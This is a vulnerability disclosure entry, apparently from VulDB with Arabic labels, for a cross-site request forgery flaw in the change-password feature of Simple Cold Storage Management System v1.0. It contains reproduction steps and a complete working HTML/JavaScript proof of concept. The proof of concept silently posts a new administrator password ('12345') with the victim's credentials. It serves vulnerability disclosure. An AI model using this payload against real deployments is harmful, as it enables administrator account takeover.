| عنوان | Simple Cold Storage Management System v1.0 is vulnerable to CSRF on Change password |
|---|
| الوصف | # Exploit Title: Simple Cold Storage Management System v1.0 - CSRF ON change password
# Exploit Author: SAHIL PRASAD
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html
# Software Link: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html
# Version: v1.0
# Tested on: Windows 10, Apache
Description: Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
Vulnerable Parameters:
change password
Steps:
1) Login into admin/user account
2) Now Go to profile
3) Now in Parameter password change the password
4) Hit burpsuite and capture the request
5) Generate CSRF poc and expoilt that poc in browser
6) Now got back to the site and log out and login with new password and you will get redirect to the dashboard
Payload:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/localhost\/csms\/classes\/Users.php?f=save", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryg5STs5oE1IeCxjQy");
xhr.setRequestHeader("Accept-Language", "en-GB,en-US;q=0.9,en;q=0.8");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryg5STs5oE1IeCxjQy\r\n" +
"Content-Disposition: form-data; name=\"id\"\r\n" +
"\r\n" +
"1\r\n" +
"------WebKitFormBoundaryg5STs5oE1IeCxjQy\r\n" +
"Content-Disposition: form-data; name=\"firstname\"\r\n" +
"\r\n" +
"Adminstrator\r\n" +
"------WebKitFormBoundaryg5STs5oE1IeCxjQy\r\n" +
"Content-Disposition: form-data; name=\"lastname\"\r\n" +
"\r\n" +
"Admin\r\n" +
"------WebKitFormBoundaryg5STs5oE1IeCxjQy\r\n" +
"Content-Disposition: form-data; name=\"username\"\r\n" +
"\r\n" +
"admin\r\n" +
"------WebKitFormBoundaryg5STs5oE1IeCxjQy\r\n" +
"Content-Disposition: form-data; name=\"password\"\r\n" +
"\r\n" +
"12345\r\n" +
"------WebKitFormBoundaryg5STs5oE1IeCxjQy\r\n" +
"Content-Disposition: form-data; name=\"img\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryg5STs5oE1IeCxjQy--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
|
|---|
| المصدر | ⚠️ https://github.com/jusstSahil/CSRF-/blob/main/POC |
|---|
| المستخدم | JustSahil (UID 33806) |
|---|
| ارسال | 17/10/2022 08:54 PM (4 سنوات منذ) |
|---|
| الاعتدال | 18/10/2022 11:33 AM (15 hours later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 211189 [SourceCodester Simple Cold Storage Management System 1.0 change password تزوير طلبات عبر المواقع] |
|---|
| النقاط | 20 |
|---|